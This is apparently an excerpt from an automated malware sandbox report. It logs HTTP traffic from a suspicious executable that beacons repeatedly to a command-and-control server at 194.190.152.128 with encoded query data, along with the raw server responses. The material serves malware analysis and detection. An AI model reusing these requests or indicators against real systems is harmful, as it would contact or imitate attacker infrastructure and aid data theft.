6c 64 52 4e 44 62 35 52 32 52 31 45 6a 59 79 34 6b 5a 69 31 47 62 75 52 32 56 34 64 6e 59 79 59 6c 62 4a 6c 57 51 6e 4e 55 61 33 6c 57 53 71 39 57 61 61 64 6c 55 32 46 6c 4d 47 52 6e 57 47 6c 54 64 68 64 46 5a 78 49 47 53 43 5a 6e 57 58 4e 57 61 4a 4e 55 51 4c 78 30 51 4a 6c 32 54 70 70 45 62 61 64 55 4f 45 6c 31 56 57 6c 58 57 57 6c 54 64 68 64 46 5a 78 49 47 53 43 5a 6e 57 58 4e 57 61 4a 4e 55 51 4c 78 30 51 4b 39 57 57 79 77 57 65 6b 5a 31 62 70 39 55 61 4b 78 6d 59 58
            Data Ascii: ==QficTZiVTMzIWZzEGO2ADZ4Y2M4YTMidDNxYzMkZjM3gDMiojIiVjYiZ2N5MmNmdTO1EWZyATOlZTMlNzYxQmZiZjYhVjIsIiZR9meORVW1wkaBZTSupEbkhkSsRWb1YXUzwmai1mV5NmbWpGWyUDcaNjVzN2R5wmW5l0ZJF0bzl0aalUU5lkNJpGaHZlRWZmYHlTaihFbUV2VOVnWYpUekdlTmJWbs5GZXh3diJjVulUaBd2QpdXaStGaElkavlmYHlTaihFbUV2VOVnWYpUekdlTmJWbs5GZXh3diJjVulUaBd2QpdXaStGaElkavlmWXJldRNDbqJWbWl3YuZlaYJTNwp1MWN3YHlDbalXSnlUQvNXSthmahhlSxcVa5MmWYJkdj5mVGlkavlmWXVjdl1mV0FGWSZmYtxmbkdFe3JmMW5WSpF0ZDl2dp1ERBdXTTlkNJ5mTxE2VShWVuxmaZhlSxklMOJkYtlDckdkRqJmM4ZmYtxmbkdFe3JmMW5WSpF0ZDl2dp9ERFNjTTRDNJp2bpp1VSFDZHxmbi1WOzhlM1AnWzY1cjdUOspVeJdWSB92cJpWTwwkajBTSq9WaadlUxQ2RsBTWXhnZi1GbuR2V4dnYyYlbJlWQnNUa3lmWYJkdj5mVGlkavlmWXFDaU5mU1p1V1AHZHVjdZFTO1F2VkFjYIJkdad1Ypl0QBtETDpkVSNVS2kUbWtmYw4EMi1mV1FGWSVnYy4kZi1GbuR2V4dnYyYlbJlWQnNUa4x2YygHaap2bppFWSh2YsJlQW5mVshlM1AnWzY1cjdUOspVeJdWSB92cNR0bpZVVWVXYWlTdhdFZxIGSCZnWXNWaJNUQLx0QKtmYtZ0cj1mV2Q2RsNTV5lkNJ1mV0lVV1UzYuJVdkdVOqhlM1AnWzY1cjdUOspVeJdWSB92cJtGaElkavlmWXJldRNDb5R2R1EjYy4kZi1GbuR2V4dnYyYlbJlWQnNUa3lWSq9WaadlU2FlMGRnWGlTdhdFZxIGSCZnWXNWaJNUQLx0QJl2TppEbadUOEl1VWlXWWlTdhdFZxIGSCZnWXNWaJNUQLx0QK9WWywWekZ1bp9UaKxmYX
            Sep 20, 2022 14:19:02.845776081 CEST121INData Raw: 5a 30 54 69 31 57 4f 77 70 6c 4d 57 6c 48 57 79 55 44 63 61 4e 6a 56 7a 4e 32 52 35 77 6d 57 35 6c 30 5a 4a 46 30 62 7a 6c 30 61 6f 46 57 53 71 39 57 61 61 64 6c 55 32 46 6c 4d 31 59 58 59 58 52 47 62 6a 78 57 4f 31 46 32 56 6b 46 6a 59 49 4a 6b
            Data Ascii: Z0Ti1WOwplMWlHWyUDcaNjVzN2R5wmW5l0ZJF0bzl0aoFWSq9WaadlU2FlM1YXYXRGbjxWO1F2VkFjYIJkdad1Ypl0QBtETDp0bZJDb5RmVvl2TppUdiJDbupFWKZmYtxmbkdFe3JmMW5WSpF0ZDl2dpF2ROB3YuZVYJp2bpVGWSBXWxkTdhdFZxIGSCZnWXNWaJNUQLx0QJVHUtVkdYREe0JmMNVnWHVDcihFaoJ2U1MDZzMmd


            Session IDSource IPSource PortDestination IPDestination PortProcess
            1192.168.2.349713194.190.152.12880C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exe
            TimestampkBytes transferredDirectionData
            Sep 20, 2022 14:19:20.875137091 CEST122OUTGET /downloads/Pipepollapi.php?wFLaQKhizqFIZe4ibySgNJDenOk=g22zdeBu3xOP7Tp51xQFNa6WCIomBqw&eed4ad65d678198d0c3734e0ead7b030=AZkFTZkN2M1AzM1ITM5UGM4QzM0cTY0YWNyUWYmFTM4MTZjJTMhZ2M0gDMxUTN3YTOxATOyADO&8777d2f9c3d9f9dbfdad95d8b9ba9864=gNkBzMlhDNwUWY3czMyETNzQWMilTZiVWNwITZhNWYilzN1Y2M3QWM&10f03f723aff9ffb3fee0f8177e9e6b3=0VfiIiOiMWNxEmM0ATN4IzNhFTM4EDZiJzM5gTNjZWZ0ETZyYGMiwiI2kjMwATZmFWY2IGN2UTYzQWYjZWZlljZyEmNzMjYkFjYkRjY3ATYkJiOikjY0QjMyMTMxMmZkZ2MyY2MkFTYykTZkJDZ2M2YyITOiwiIwgTYkNTN1IDO5MjN1IDMzMGZ2EWNyE2NyQjM4QmM5cDMiZzY3EWNhJiOiAjZihzNjVWMyMWMmNjNjF2YzcjZwMTYwE2YlVzNxITYis3W HTTP/1.1
            Accept: */*
            Content-Type: text/javascript
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
            Host: 194.190.152.128
            Sep 20, 2022 14:19:20.940133095 CEST125INHTTP/1.1 200 OK
            Date: Tue, 20 Sep 2022 12:19:20 GMT
            Server: Apache/2.4.41 (Ubuntu)
            Content-Length: 0
            Content-Type: text/html; charset=UTF-8


            Session IDSource IPSource PortDestination IPDestination PortProcess
            2192.168.2.349712194.190.152.12880C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exe
            TimestampkBytes transferredDirectionData
            Sep 20, 2022 14:19:20.875698090 CEST125OUTGET /downloads/Pipepollapi.php?wFLaQKhizqFIZe4ibySgNJDenOk=g22zdeBu3xOP7Tp51xQFNa6WCIomBqw&eed4ad65d678198d0c3734e0ead7b030=AZkFTZkN2M1AzM1ITM5UGM4QzM0cTY0YWNyUWYmFTM4MTZjJTMhZ2M0gDMxUTN3YTOxATOyADO&8777d2f9c3d9f9dbfdad95d8b9ba9864=gNkBzMlhDNwUWY3czMyETNzQWMilTZiVWNwITZhNWYilzN1Y2M3QWM&d27a34634985a25501c496211d5e58c7=d1nIlVGMxQ2NzgjN0kjN5EmYxU2M1MTO2Q2MiVDN3gjZmBjZhJTOjZWZ5IiOikjY0QjMyMTMxMmZkZ2MyY2MkFTYykTZkJDZ2M2YyITOiwiIwgTYkNTN1IDO5MjN1IDMzMGZ2EWNyE2NyQjM4QmM5cDMiZzY3EWNhJiOiAjZihzNjVWMyMWMmNjNjF2YzcjZwMTYwE2YlVzNxITYis3W&10f03f723aff9ffb3fee0f8177e9e6b3=d1nIiojIjVTMhJDNwUDOycTYxEDOxQmYyMTO4UzYmVGNxUmMmBjIsISZlBTMkdzM4YDN5YTOhJWMlNTNzkjNkNjY1QzN4YmZwYWYykzYmVWOiojI5IGN0IjMzETMjZGZmNjMmNDZxEmM5UGZyQmNjNmMykjIsICM4EGZzUTNygTOzYTNyAzMjRmNhVjMhdjM0IDOkJTO3AjY2M2NhVTYiojIwYmY4czYlFjMjFjZzYzYhN2M3YGMzEGMhNWZ1cTMyEmI7xSfiADWOZTSDRWM5clW0x2RWdnVXp1cOxWSzl0UaJDbHRmaGtWS2kUejFjUYlFMOZVZwwWbkBnUzklQKNETplEWa5mRtJGaxUUS0ZUbj5WOtNWUKl2TpN2MitWNXFGWSFTUCp0QMlGNrlkNJNlYo5UbZxGZxMGcKNETptGbJZTSTpVd5cUY3lTbjpGbXRles1WSzl0ULVHZzIWd01mYWh2QJVHZzIWd01mYWpUaPlWVXJGa1UlVR50aJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFFZrl0cJN1Vp9maJVHbXJ2aGBzYwp0QMlWSp9UajVVUVp0QMlWUYF2QCNkTyE0UapHbtN2dKhlWwUzVSdWQU10ZNNDZ2JVbiBHZslkNJl2YspFbiBHZsl0cw4WSv50VhlnVudldVd0Y2pEWkZkSp9UaV1mY2BHWaRHbHRWa3lWS3FERNdXQE1UavpWSzZ0RkpXOHNWa3lWSrVzVZNnSYplNShVYz4kRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0UkeOFDND90cNRkT1NGROl2bqlka5ckYpdXaJlkTrlkNJNVZ5JlbiFTOykVa3lWSv50VhlnVudVavpWS1lzVh5mVtNWa3lWSv50VhlnVudVavpWS1IFWhpmSDxUaNRkT1lEVOV3YU1UdRR0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS2IVbjhGatlkNJNlW0ZUbUlnVyMmVKNETpNmaNNzZ61EeJl2TpV1VihWNwEVUKNETp1keNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiMWNxEmM0ATN4IzNhFTM4EDZiJzM5gTNjZWZ0ETZyYGMiwiIyYWYhVWMlFjM3YmYhNzNwcjY4ITO4kDO3IWNhdTOmBzM2MDMlRWN5IiOikjY0QjMyMTMxMmZkZ2MyY2MkFTYykTZkJDZ2M2YyITOiwiIwgTYkNTN1IDO5MjN1IDMzMGZ2EWNyE2NyQjM4QmM5cDMiZzY3EWNhJiOiAjZihzNjVWMyMWMmNjNjF2YzcjZwMTYwE2YlVzNxITYis3W HTTP/1.1
            Accept: */*
            Content-Type: text/javascript
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
            Host: 194.190.152.128
            Sep 20, 2022 14:19:20.941771984 CEST125INHTTP/1.1 200 OK
            Date: Tue, 20 Sep 2022 12:19:20 GMT
            Server: Apache/2.4.41 (Ubuntu)
            Vary: Accept-Encoding
            Content-Length: 104
            Content-Type: text/html; charset=UTF-8
            Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 53 4f 6a 4a 54 4e 6c 6c 54 5a 30 45 54 4f 6b 4a 7a 4e 33 59 57 4f 30 51 47 4d 35 59 54 5a 68 64 44 4f 31 59 44 4e 69 42 6a 59 6b 4a 79 65 36 49 69 4e 32 63 54 59 69 4a 57 4f 30 51 44 4e 6b 42 7a 59 6a 52 32 4e 30 59 57 59 34 67 54 5a 6b 52 54 59 77 51 54 5a 77 51 32 4d 69 4a 79 65
            Data Ascii: ==Qf9JiI6ISOjJTNllTZ0ETOkJzN3YWO0QGM5YTZhdDO1YDNiBjYkJye6IiN2cTYiJWO0QDNkBzYjR2N0YWY4gTZkRTYwQTZwQ2MiJye


            Session IDSource IPSource PortDestination IPDestination PortProcess
            3192.168.2.349714194.190.152.12880C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exe
            TimestampkBytes transferredDirectionData
            Sep 20, 2022 14:19:21.134597063 CEST127OUTGET /downloads/Pipepollapi.php?wFLaQKhizqFIZe4ibySgNJDenOk=g22zdeBu3xOP7Tp51xQFNa6WCIomBqw&eed4ad65d678198d0c3734e0ead7b030=AZkFTZkN2M1AzM1ITM5UGM4QzM0cTY0YWNyUWYmFTM4MTZjJTMhZ2M0gDMxUTN3YTOxATOyADO&8777d2f9c3d9f9dbfdad95d8b9ba9864=gNkBzMlhDNwUWY3czMyETNzQWMilTZiVWNwITZhNWYilzN1Y2M3QWM&72bf888d6a47dcb7b598ddaa2d446ee7=0VfiAjbJNHeyI2UCNVW5Z1VihmTFh1YOhlW5ZFSkpGbHV1Y4xWZrpEWZ9GeGhleKhlW6ZlRYNGc6FVavpWSvJFWZFlSDxUa0IDZ2VjMhVnVslkNJNUYwY0RVtmSzImaOhVYFp0QMlWSp9UandEZoJkVihmSzoFb4dlWVp0QMlWSp9UaNh0Y3ZUVihmVHRGVKNETpRjMkZXNyEWdWxWS2k0QSpkSYpleWZlYoZ1RkRlSDxUa0IDZ2VjMhVnVslkNJl2Ys5EWWRnRXpFMOxWSzlUaiNTOtJmc1clVp9maJ5WNXlVTxcVWsJ1MVl2dplUdkNjY1RXbiZlSp9UandEZoJkVihmVHRGVKNETpFleOpXSUxUboRkT0cmaZpmWyUWdwgUT3FERNdXQE10d0MVT1FkaMd3culkNJl3YsVjMi9mQzIWeOdVYOp0QMlWSp9UaNhlYo5UbZxGZsl0cJlmYjpESYh3aWFVTCFTVKJVRYNWNDh1Y4ZEWp9maJpXNXpFbKNTWUp0QMlWSqx0M0MkTp9maJVXOXFmeKhlWXRXbjZHZYpFdG12YHpUelJiOiMWNxEmM0ATN4IzNhFTM4EDZiJzM5gTNjZWZ0ETZyYGMiwiI2kjMwATZmFWY2IGN2UTYzQWYjZWZlljZyEmNzMjYkFjYkRjY3ATYkJiOikjY0QjMyMTMxMmZkZ2MyY2MkFTYykTZkJDZ2M2YyITOiwiIwgTYkNTN1IDO5MjN1IDMzMGZ2EWNyE2NyQjM4QmM5cDMiZzY3EWNhJiOiAjZihzNjVWMyMWMmNjNjF2YzcjZwMTYwE2YlVzNxITYis3W HTTP/1.1
            Accept: */*
            Content-Type: text/javascript
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
            Host: 194.190.152.128
            Connection: Keep-Alive
            Sep 20, 2022 14:19:21.195135117 CEST127INHTTP/1.1 200 OK
            Date: Tue, 20 Sep 2022 12:19:21 GMT
            Server: Apache/2.4.41 (Ubuntu)
            Content-Length: 0
            Keep-Alive: timeout=5, max=100
            Connection: Keep-Alive
            Content-Type: text/html; charset=UTF-8


            Session IDSource IPSource PortDestination IPDestination PortProcess
            4192.168.2.349715194.190.152.12880C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exe
            TimestampkBytes transferredDirectionData
            Sep 20, 2022 14:19:26.172207117 CEST130OUTGET /downloads/Pipepollapi.php?wFLaQKhizqFIZe4ibySgNJDenOk=g22zdeBu3xOP7Tp51xQFNa6WCIomBqw&eed4ad65d678198d0c3734e0ead7b030=AZkFTZkN2M1AzM1ITM5UGM4QzM0cTY0YWNyUWYmFTM4MTZjJTMhZ2M0gDMxUTN3YTOxATOyADO&8777d2f9c3d9f9dbfdad95d8b9ba9864=gNkBzMlhDNwUWY3czMyETNzQWMilTZiVWNwITZhNWYilzN1Y2M3QWM&d27a34634985a25501c496211d5e58c7=d1nIlVGMxQ2NzgjN0kjN5EmYxU2M1MTO2Q2MiVDN3gjZmBjZhJTOjZWZ5IiOikjY0QjMyMTMxMmZkZ2MyY2MkFTYykTZkJDZ2M2YyITOiwiIwgTYkNTN1IDO5MjN1IDMzMGZ2EWNyE2NyQjM4QmM5cDMiZzY3EWNhJiOiAjZihzNjVWMyMWMmNjNjF2YzcjZwMTYwE2YlVzNxITYis3W&10f03f723aff9ffb3fee0f8177e9e6b3=d1nIiojIjVTMhJDNwUDOycTYxEDOxQmYyMTO4UzYmVGNxUmMmBjIsISZlBTMkdzM4YDN5YTOhJWMlNTNzkjNkNjY1QzN4YmZwYWYykzYmVWOiojI5IGN0IjMzETMjZGZmNjMmNDZxEmM5UGZyQmNjNmMykjIsICM4EGZzUTNygTOzYTNyAzMjRmNhVjMhdjM0IDOkJTO3AjY2M2NhVTYiojIwYmY4czYlFjMjFjZzYzYhN2M3YGMzEGMhNWZ1cTMyEmI7xSfiElZx8maJBjVzIGbxcVYVJEWaxGeyUVa3lWSuVzVhdnVXp1cOxWS2kUejFjUYlFMOZVZwwWbkBnUzklQKNETplEWa5mRtJGaxUUS0ZUbj5WOtNWUKl2TpN2MitWNXFGWSFTUCp0QMlGNrlkNJNlYo5UbZxGZxMGcKNETptGbJZTSTpVd5cUY3lTbjpGbXRles1WSzl0ULVHZzIWd01mYWh2QJVHZzIWd01mYWpUaPlWVXJGa1UlVR50aJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFFZrl0cJN1Vp9maJVHbXJ2aGBzYwp0QMlWSp9UajVVUVp0QMlWUYF2QCNkTyE0UapHbtN2dKhlWwUzVSdWQU10ZNNDZ2JVbiBHZslkNJl2YspFbiBHZsl0cw4WSv50VhlnVudldVd0Y2pEWkZkSp9UaV1mY2BHWaRHbHRWa3lWS3FERNdXQE1UavpWSzZ0RkpXOHNWa3lWSrVzVZNnSYplNShVYz4kRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0UkeOFDND90cNRkT1NGROl2bqlka5ckYpdXaJlkTrlkNJNVZ5JlbiFTOykVa3lWSv50VhlnVudVavpWS1lzVh5mVtNWa3lWSv50VhlnVudVavpWS1IFWhpmSDxUaNRkT1lEVOV3YU1UdRR0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS2IVbjhGatlkNJNlW0ZUbUlnVyMmVKNETpNmaNNzZ61EeJl2TpV1VihWNwEVUKNETp1keNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiMWNxEmM0ATN4IzNhFTM4EDZiJzM5gTNjZWZ0ETZyYGMiwiIyYWYhVWMlFjM3YmYhNzNwcjY4ITO4kDO3IWNhdTOmBzM2MDMlRWN5IiOikjY0QjMyMTMxMmZkZ2MyY2MkFTYykTZkJDZ2M2YyITOiwiIwgTYkNTN1IDO5MjN1IDMzMGZ2EWNyE2NyQjM4QmM5cDMiZzY3EWNhJiOiAjZihzNjVWMyMWMmNjNjF2YzcjZwMTYwE2YlVzNxITYis3W HTTP/1.1
            Accept: */*
            Content-Type: text/javascript
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
            Host: 194.190.152.128
            Connection: Keep-Alive
            Sep 20, 2022 14:19:26.235904932 CEST131INHTTP/1.1 200 OK
            Date: Tue, 20 Sep 2022 12:19:26 GMT
            Server: Apache/2.4.41 (Ubuntu)
            Vary: Accept-Encoding
            Content-Length: 104
            Keep-Alive: timeout=5, max=100
            Connection: Keep-Alive
            Content-Type: text/html; charset=UTF-8
            Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 53 4f 6a 4a 54 4e 6c 6c 54 5a 30 45 54 4f 6b 4a 7a 4e 33 59 57 4f 30 51 47 4d 35 59 54 5a 68 64 44 4f 31 59 44 4e 69 42 6a 59 6b 4a 79 65 36 49 69 4e 32 63 54 59 69 4a 57 4f 30 51 44 4e 6b 42 7a 59 6a 52 32 4e 30 59 57 59 34 67 54 5a 6b 52 54 59 77 51 54 5a 77 51 32 4d 69 4a 79 65
            Data Ascii: ==Qf9JiI6ISOjJTNllTZ0ETOkJzN3YWO0QGM5YTZhdDO1YDNiBjYkJye6IiN2cTYiJWO0QDNkBzYjR2N0YWY4gTZkRTYwQTZwQ2MiJye


            Session IDSource IPSource PortDestination IPDestination PortProcess
            5192.168.2.349718194.190.152.12880C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exe
            TimestampkBytes transferredDirectionData
            Sep 20, 2022 14:19:31.352000952 CEST183OUTGET /downloads/Pipepollapi.php?wFLaQKhizqFIZe4ibySgNJDenOk=g22zdeBu3xOP7Tp51xQFNa6WCIomBqw&eed4ad65d678198d0c3734e0ead7b030=AZkFTZkN2M1AzM1ITM5UGM4QzM0cTY0YWNyUWYmFTM4MTZjJTMhZ2M0gDMxUTN3YTOxATOyADO&8777d2f9c3d9f9dbfdad95d8b9ba9864=gNkBzMlhDNwUWY3czMyETNzQWMilTZiVWNwITZhNWYilzN1Y2M3QWM&d27a34634985a25501c496211d5e58c7=d1nIlVGMxQ2NzgjN0kjN5EmYxU2M1MTO2Q2MiVDN3gjZmBjZhJTOjZWZ5IiOikjY0QjMyMTMxMmZkZ2MyY2MkFTYykTZkJDZ2M2YyITOiwiIwgTYkNTN1IDO5MjN1IDMzMGZ2EWNyE2NyQjM4QmM5cDMiZzY3EWNhJiOiAjZihzNjVWMyMWMmNjNjF2YzcjZwMTYwE2YlVzNxITYis3W&10f03f723aff9ffb3fee0f8177e9e6b3=d1nIiojIjVTMhJDNwUDOycTYxEDOxQmYyMTO4UzYmVGNxUmMmBjIsISZlBTMkdzM4YDN5YTOhJWMlNTNzkjNkNjY1QzN4YmZwYWYykzYmVWOiojI5IGN0IjMzETMjZGZmNjMmNDZxEmM5UGZyQmNjNmMykjIsICM4EGZzUTNygTOzYTNyAzMjRmNhVjMhdjM0IDOkJTO3AjY2M2NhVTYiojIwYmY4czYlFjMjFjZzYzYhN2M3YGMzEGMhNWZ1cTMyEmI7xSfiElZx8maJBjVzIGbxcVYVJEWaxGeyUVa3lWSuVzVhdnVXp1cOxWS2kUejFjUYlFMOZVZwwWbkBnUzklQKNETplEWa5mRtJGaxUUS0ZUbj5WOtNWUKl2TpN2MitWNXFGWSFTUCp0QMlGNrlkNJNlYo5UbZxGZxMGcKNETptGbJZTSTpVd5cUY3lTbjpGbXRles1WSzl0ULVHZzIWd01mYWh2QJVHZzIWd01mYWpUaPlWVXJGa1UlVR50aJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFFZrl0cJN1Vp9maJVHbXJ2aGBzYwp0QMlWSp9UajVVUVp0QMlWUYF2QCNkTyE0UapHbtN2dKhlWwUzVSdWQU10ZNNDZ2JVbiBHZslkNJl2YspFbiBHZsl0cw4WSv50VhlnVudldVd0Y2pEWkZkSp9UaV1mY2BHWaRHbHRWa3lWS3FERNdXQE1UavpWSzZ0RkpXOHNWa3lWSrVzVZNnSYplNShVYz4kRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0UkeOFDND90cNRkT1NGROl2bqlka5ckYpdXaJlkTrlkNJNVZ5JlbiFTOykVa3lWSv50VhlnVudVavpWS1lzVh5mVtNWa3lWSv50VhlnVudVavpWS1IFWhpmSDxUaNRkT1lEVOV3YU1UdRR0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS2IVbjhGatlkNJNlW0ZUbUlnVyMmVKNETpNmaNNzZ61EeJl2TpV1VihWNwEVUKNETp1keNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiMWNxEmM0ATN4IzNhFTM4EDZiJzM5gTNjZWZ0ETZyYGMiwiIyYWYhVWMlFjM3YmYhNzNwcjY4ITO4kDO3IWNhdTOmBzM2MDMlRWN5IiOikjY0QjMyMTMxMmZkZ2MyY2MkFTYykTZkJDZ2M2YyITOiwiIwgTYkNTN1IDO5MjN1IDMzMGZ2EWNyE2NyQjM4QmM5cDMiZzY3EWNhJiOiAjZihzNjVWMyMWMmNjNjF2YzcjZwMTYwE2YlVzNxITYis3W HTTP/1.1
            Accept: */*
            Content-Type: text/javascript
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
            Host: 194.190.152.128
            Connection: Keep-Alive
            Sep 20, 2022 14:19:31.415062904 CEST183INHTTP/1.1 200 OK
            Date: Tue, 20 Sep 2022 12:19:31 GMT
            Server: Apache/2.4.41 (Ubuntu)
            Vary: Accept-Encoding
            Content-Length: 104
            Keep-Alive: timeout=5, max=100
            Connection: Keep-Alive
            Content-Type: text/html; charset=UTF-8
            Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 53 4f 6a 4a 54 4e 6c 6c 54 5a 30 45 54 4f 6b 4a 7a 4e 33 59 57 4f 30 51 47 4d 35 59 54 5a 68 64 44 4f 31 59 44 4e 69 42 6a 59 6b 4a 79 65 36 49 69 4e 32 63 54 59 69 4a 57 4f 30 51 44 4e 6b 42 7a 59 6a 52 32 4e 30 59 57 59 34 67 54 5a 6b 52 54 59 77 51 54 5a 77 51 32 4d 69 4a 79 65
            Data Ascii: ==Qf9JiI6ISOjJTNllTZ0ETOkJzN3YWO0QGM5YTZhdDO1YDNiBjYkJye6IiN2cTYiJWO0QDNkBzYjR2N0YWY4gTZkRTYwQTZwQ2MiJye


            Session IDSource IPSource PortDestination IPDestination PortProcess
            6192.168.2.349721194.190.152.12880C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exe
            TimestampkBytes transferredDirectionData
            Sep 20, 2022 14:19:36.483727932 CEST205OUTGET /downloads/Pipepollapi.php?wFLaQKhizqFIZe4ibySgNJDenOk=g22zdeBu3xOP7Tp51xQFNa6WCIomBqw&eed4ad65d678198d0c3734e0ead7b030=AZkFTZkN2M1AzM1ITM5UGM4QzM0cTY0YWNyUWYmFTM4MTZjJTMhZ2M0gDMxUTN3YTOxATOyADO&8777d2f9c3d9f9dbfdad95d8b9ba9864=gNkBzMlhDNwUWY3czMyETNzQWMilTZiVWNwITZhNWYilzN1Y2M3QWM&d27a34634985a25501c496211d5e58c7=d1nIlVGMxQ2NzgjN0kjN5EmYxU2M1MTO2Q2MiVDN3gjZmBjZhJTOjZWZ5IiOikjY0QjMyMTMxMmZkZ2MyY2MkFTYykTZkJDZ2M2YyITOiwiIwgTYkNTN1IDO5MjN1IDMzMGZ2EWNyE2NyQjM4QmM5cDMiZzY3EWNhJiOiAjZihzNjVWMyMWMmNjNjF2YzcjZwMTYwE2YlVzNxITYis3W&10f03f723aff9ffb3fee0f8177e9e6b3=d1nIiojIjVTMhJDNwUDOycTYxEDOxQmYyMTO4UzYmVGNxUmMmBjIsISZlBTMkdzM4YDN5YTOhJWMlNTNzkjNkNjY1QzN4YmZwYWYykzYmVWOiojI5IGN0IjMzETMjZGZmNjMmNDZxEmM5UGZyQmNjNmMykjIsICM4EGZzUTNygTOzYTNyAzMjRmNhVjMhdjM0IDOkJTO3AjY2M2NhVTYiojIwYmY4czYlFjMjFjZzYzYhN2M3YGMzEGMhNWZ1cTMyEmI7xSfiElZx8maJBjVzIGbxcVYVJEWaxGeyUVa3lWSuVzVhdnVXp1cOxWS2kUejFjUYlFMOZVZwwWbkBnUzklQKNETplEWa5mRtJGaxUUS0ZUbj5WOtNWUKl2TpN2MitWNXFGWSFTUCp0QMlGNrlkNJNlYo5UbZxGZxMGcKNETptGbJZTSTpVd5cUY3lTbjpGbXRles1WSzl0ULVHZzIWd01mYWh2QJVHZzIWd01mYWpUaPlWVXJGa1UlVR50aJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFFZrl0cJN1Vp9maJVHbXJ2aGBzYwp0QMlWSp9UajVVUVp0QMlWUYF2QCNkTyE0UapHbtN2dKhlWwUzVSdWQU10ZNNDZ2JVbiBHZslkNJl2YspFbiBHZsl0cw4WSv50VhlnVudldVd0Y2pEWkZkSp9UaV1mY2BHWaRHbHRWa3lWS3FERNdXQE1UavpWSzZ0RkpXOHNWa3lWSrVzVZNnSYplNShVYz4kRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0UkeOFDND90cNRkT1NGROl2bqlka5ckYpdXaJlkTrlkNJNVZ5JlbiFTOykVa3lWSv50VhlnVudVavpWS1lzVh5mVtNWa3lWSv50VhlnVudVavpWS1IFWhpmSDxUaNRkT1lEVOV3YU1UdRR0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS2IVbjhGatlkNJNlW0ZUbUlnVyMmVKNETpNmaNNzZ61EeJl2TpV1VihWNwEVUKNETp1keNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiMWNxEmM0ATN4IzNhFTM4EDZiJzM5gTNjZWZ0ETZyYGMiwiIyYWYhVWMlFjM3YmYhNzNwcjY4ITO4kDO3IWNhdTOmBzM2MDMlRWN5IiOikjY0QjMyMTMxMmZkZ2MyY2MkFTYykTZkJDZ2M2YyITOiwiIwgTYkNTN1IDO5MjN1IDMzMGZ2EWNyE2NyQjM4QmM5cDMiZzY3EWNhJiOiAjZihzNjVWMyMWMmNjNjF2YzcjZwMTYwE2YlVzNxITYis3W HTTP/1.1
            Accept: */*
            Content-Type: text/javascript
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
            Host: 194.190.152.128
            Connection: Keep-Alive
            Sep 20, 2022 14:19:36.548834085 CEST206INHTTP/1.1 200 OK
            Date: Tue, 20 Sep 2022 12:19:36 GMT
            Server: Apache/2.4.41 (Ubuntu)
            Vary: Accept-Encoding
            Content-Length: 104
            Keep-Alive: timeout=5, max=100
            Connection: Keep-Alive
            Content-Type: text/html; charset=UTF-8
            Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 53 4f 6a 4a 54 4e 6c 6c 54 5a 30 45 54 4f 6b 4a 7a 4e 33 59 57 4f 30 51 47 4d 35 59 54 5a 68 64 44 4f 31 59 44 4e 69 42 6a 59 6b 4a 79 65 36 49 69 4e 32 63 54 59 69 4a 57 4f 30 51 44 4e 6b 42 7a 59 6a 52 32 4e 30 59 57 59 34 67 54 5a 6b 52 54 59 77 51 54 5a 77 51 32 4d 69 4a 79 65
            Data Ascii: ==Qf9JiI6ISOjJTNllTZ0ETOkJzN3YWO0QGM5YTZhdDO1YDNiBjYkJye6IiN2cTYiJWO0QDNkBzYjR2N0YWY4gTZkRTYwQTZwQ2MiJye


            Statistics

            CPU Usage

            Click to jump to process

            Memory Usage

            Click to jump to process

            High Level Behavior Distribution

            Click to dive into process behavior distribution

            Behavior

            Click to jump to process

            System Behavior

            General

            Target ID:0
            Start time:14:17:23
            Start date:20/09/2022
